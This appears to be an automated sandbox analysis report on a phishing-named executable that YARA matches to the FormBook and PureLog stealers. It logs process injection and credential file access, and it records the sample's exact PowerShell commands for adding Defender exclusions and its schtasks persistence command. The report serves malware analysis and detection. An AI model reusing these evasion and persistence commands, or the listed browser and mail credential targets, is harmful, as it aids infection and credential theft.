Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\sdiagnhost.exe Thread APC queued: target process: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\sdiagnhost.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Jump to behavior
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Manager
Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Queries volume information: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Queries volume information: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 13.2.fcLfLlfpmjf.exe.28a731c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.fcLfLlfpmjf.exe.28a731c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.5a00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.BANK DETAILS CORRECTIONS.exe.2dd733c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1361939859.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\sdiagnhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 13.2.fcLfLlfpmjf.exe.28a731c.0.unpack, type: UNPACKEDPE
